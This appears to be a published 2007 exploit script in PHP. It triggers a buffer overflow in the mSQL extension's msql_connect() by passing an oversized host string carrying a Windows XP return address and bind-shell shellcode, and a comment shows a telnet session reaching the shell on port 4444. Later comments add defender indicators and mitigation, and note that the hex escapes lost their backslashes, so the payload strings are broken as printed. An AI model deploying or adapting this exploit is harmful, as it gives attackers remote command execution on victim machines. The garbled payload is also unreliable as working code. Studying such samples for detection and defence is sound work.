# Title : PHP mSQL (msql_connect) Local Buffer Overflow Exploit
# Published : 2007-08-08
# Author : Inphex
<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:apache>
*/
// Published proof-of-concept (2007) that overflows a buffer in the mSQL
// extension's msql_connect() by passing an oversized host string. It only does
// anything where the mSQL extension is loaded; the guard below aborts otherwise.
//
// Defender notes: the whole payload is the single argument on the last line
// (49422 filler bytes plus a short trailer), so the host-level indicator is a
// PHP worker calling msql_connect() with a ~49 KB string. The transcript above
// shows the author's bind shell listening on TCP 4444 on a test VM; a web-server
// process opening a listening socket is the corresponding detection signal.
// Mitigation: keep the mSQL extension disabled where it is not required, and do
// not execute untrusted PHP source on hosts where it is enabled.
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}
// Value the author intends to land on the saved return address; the trailing
// comment names a CALL EBP gadget in shell32.dll on Windows XP.
// NOTE(review): as printed on this page the "x.." sequences are plain ASCII
// letters, not byte escapes -- the backslashes appear to have been lost in
// extraction, so every hex-looking string here is literal text as written.
$ret = "xA3x3Dx92x7C"; #shell32.dll ->CALL EBP WindowsXP
// Payload blob assembled from the chunks below (same escape caveat as $ret).
$shellcode=
"xbdxdbxc6x38x8fxd9xc9xd9x74x24xf4x58x31xc9" .
"xb1x51x83xc0x04x31x68x0ex03xb3xc8xdax7axbf" .
"xbfxf1xc8xd7xb9xf9x2cxd8x5ax8dxbfx02xbfx1a" .
"x7ax76x34x60x80xfex4bx76x01xb1x53x03x49x6d" .
"x65xf8x3fxe6x51x75xbex16xa8x49x58x4ax4fx89" .
"x2fx95x91xc0xddx98xd3x3ex29xa1x87xe4xfaxa0" .
"xc2x6exa5x6ex0cx9ax3cxe5x02x17x4axa6x06xa6" .
"xa7x5bx1bx23xbex37x47x2fxa0x04xb6x94x46x01" .
"xfax1ax0cx55xf1xd1x62x49xa4x6dxc2x79xe8x19" .
"x4dx37x1ax36x01x38xf4xa0xf1xa0x91x1fxc4x44" .
"x15x13x1axcbx8dx2cx8ax9bxe6x3exd7x60xa9x3f" .
"xfexc9xc0x25x99x74x3fxadx64x23xaaxacx97x1b" .
"x42x68x6ex6ex3exddx8ex46x12xb1x23x35xc6x76" .
"x97xfaxbbx87xc7x9ax53x69xb4x04xf7x00xa5x5d" .
"x9fxb6x3cx2dxa7xe0xbfx1bx4dx1fx11xf6x6dxcf" .
"xf9x5cx3cxdex10xcbxc0xc9xb0xa6xc1x26x5exad" .
"x77x41xd6x7ax77x9bxb9xd0xd3x71xc5x08x48x11" .
"xdexd1xa9x9bx77xdexe0x09x87xf0x6bxd8x13x96" .
"x1bx7fxb1xdfx39x15x19x86xe8x26x10xdfx81xf2" .
"xaaxfdx67x3bx5fxabx76xf9x8dx55xc4xd2x5ex24" .
"xb3x12xcax9dxefx0bx7ex1fx5cxddx81xaaxe7x1d" .
"xabx0fxbfxb3x05xfex6ex5exa7x51xc0xcbxf6xae" .
"x32x9bx55x89xb6x92xf5xd6x6fx40x05xd7xa7x6a" .
"x29xacx9fx68x49x76x7bx6ex98x24x7bx40x4dx38" .
"x09x65xd1xebxf1xb0x12xdbx0ex3dxed";
//
// Trigger: one oversized connection-host argument, built as
// 'A' x 49422, then "xebx02", $ret, "x15B" and $shellcode, in that order.
// No return value is checked; the script relies on the extension misbehaving.
msql_connect(str_repeat('A',49422)."xebx02".$ret."x15B".$shellcode."");
?>